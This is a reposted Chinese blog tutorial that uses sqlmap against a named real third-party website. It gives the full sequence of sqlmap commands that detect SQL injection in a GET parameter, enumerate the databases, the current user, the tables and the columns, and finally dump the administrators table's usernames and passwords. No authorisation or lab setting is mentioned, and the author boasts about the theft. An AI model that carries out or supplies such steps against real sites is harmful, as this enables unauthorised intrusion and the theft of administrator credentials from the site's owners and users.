原文链接:https://blog.csdn.net/vala0901/article/details/71548954

有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。

1.首先要知道可以注入的网址是什么

http://www.bible-history.com/subcat.php?id=2

2.接着就可以针对这个网址来检测能不能注入,以及查看它的所有数据库列表了

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --dbs  (注意:dbs前面是两个横杠)

注入的结果表示:

(1)注入参数id为GET注入,注入类型有四种,分别是:boolean-based blind/error-based/time-based blind/union query

(2)web应用程序技术为:Apache  PHP

(3)数据库类型:MySQL

(4)画红圈的是网址所有的数据库名单

其中可能有你输入[Y/N]的,统统回车解决吧。

3.这时,我们发现这个网址存在注入,并且拿到了所有数据库名单。我们决定查看web当前使用的数据库

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-db

红线画出的就是当前使用的数据库:bible_history,一会我们会针对这个数据库下手。。。

4.探测web数据库使用的账号

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-user

可见当前的数据库使用账户为:bho@localhost

5.下面我们来探测bible_history这个数据库里的所有表

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables

其中:

(1)D指出数据库名字

(2)tables列出表

6.下面我想探测的是administrators这个表的列

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns

其中:

(1)T指定要列出字段的表

(2)columns列出列

7.表中字段明显拿到了。。。。下面一步还用说么?果断脱裤。。。。好开心。。。。

sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump

成功!!!

(PS:自从逛了大神技术贴,就再也不能好好说“拖库”了。。。满脑子都是给web脱裤。。。。我天朝的男程序员们就是如此闷骚阔爱)认真脸。。。

转载:sqlmap的应用实战相关推荐

  1. [转载]秀脱linux实战笔记linux-kernel-3.0.3实战篇

    +++++++++++++++++++++++++++++++++++++++++++++++++++++++ 秀脱linux实战笔记linux-kernel-3.0.3实战片篇: QQ:     6 ...

  2. (转载)Android项目实战(二十八):使用Zxing实现二维码及优化实例

    Android项目实战(二十八):使用Zxing实现二维码及优化实例 作者:听着music睡 字体:[增加 减小] 类型:转载 时间:2016-11-21 我要评论 这篇文章主要介绍了Android项 ...

  3. (转载)Android项目实战(二十七):数据交互(信息编辑)填写总结

    Android项目实战(二十七):数据交互(信息编辑)填写总结 前言: 项目中必定用到的数据填写需求.比如修改用户名的文字编辑对话框,修改生日的日期选择对话框等等.现总结一下,方便以后使用. 注: 先 ...

  4. SQL注入攻击及防御 手动注入+sqlmap自动化注入实战(网络安全学习12)

    CONTENTS 1 项目实验环境 2 SQL注入概述 2.1 SQL注入简介 2.2 SQL注入的危害 3 SQL基础回顾 3.1 联合查询union 3.2 information_schema数 ...

  5. [转载]Vue 2.x 实战之后台管理系统开发(一)

    2. 开发前须知 我的后台管理系统项目运用了如下框架/插件: Vue 2.x -- 项目所使用的 js 框架,我所使用的版本是:2.1.10 vue-router 2 -- Vue 2.x 配套路由, ...

  6. (转载)大数据实战:站在JMP分析平台上的FIT足迹识别技术

    http://www.csdn.net/article/2014-03-16/2818786-interview-jmp-fit 摘要: 1.作为公益性动物保护组织,WildTrack是如何在JMP统 ...

  7. [转载]Hot Door CADtools (实战篇)

    1.工具的概述 A.将CADtools工具安装到Illustrator的Plugins文件下面,安装完成后会出现一个Tools的文件夹.启动你的Illustrator后,打开菜单Window/CADt ...

  8. 【转载保存】Lucene 实战教程第六章 Lucene 的精确、包含、集合查询 Query 的简单使用

    原链接:https://www.xttblog.com/?p=3532 所有的搜索基本上都存在精确匹配,包含等操作.Lucene 中同样存在这样的操作,今天我们以 IntPoint 为例,来说说 Lu ...

  9. 企业实战|Mysql不停机维护主从同步

    转载来源 :企业实战|Mysql不停机维护主从同步 : https://mp.weixin.qq.com/s/CQFmFhtRMFsESofDpTOvUA 实战环境: Mysql-5.7 Xtraba ...

最新文章

  1. jquery的页面加载完执行的函数
  2. 如何让你的操作系统更安全二
  3. 澳网:公茂鑫/张择创历史 中国男网夺大满贯首胜
  4. LunarCrush将比特币批评家Peter Schiff列为第二大比特币影响者
  5. Oracle与MySQL使用区别
  6. Elon Mask又搞大事情:新公司要将人脑与机器连接,给大脑上传想法不再是科幻...
  7. 写一本Linux内核方面的书籍
  8. 华为发布IdeaHub S2系列,与华为云会议结合更强大
  9. Struts2通配符
  10. 2020年CSP-J2 CSP-S2 复赛题解
  11. 解决微信开发工具卡顿的问题
  12. STM32F103C8T6连接LD3320语音识别模块(USART)
  13. MSF基础--show options
  14. python hasattr() getattr() setattr()函数的使用
  15. form表单序列化 $('#form1').serialize()到后台没值
  16. 多元函数可导为什么不一定连续
  17. 打造优雅的PC环境软件篇
  18. Linux常用命令——whoami命令
  19. 数据库语言关键字分类(详细):
  20. 【HDU】1283 最简单的计算机

热门文章

  1. 剑指Offer_编程题_22
  2. poj3279 Fliptile
  3. 字符集详解 ------------------------ UNICODE +UTF8
  4. 解决ScrollView嵌套ViewPager出现的滑动冲突问题
  5. NDK JNI方式读写Android系统的GPIO
  6. 用shell写了一个自动编译代码的脚本
  7. 2021全州高中高考成绩查询,最新!最全!桂林各中学高考成绩汇总!为桂林考生骄傲!...
  8. WebStorm添加多个项目到当前工程目录
  9. .net运行项目的几种形式
  10. swift中使用core data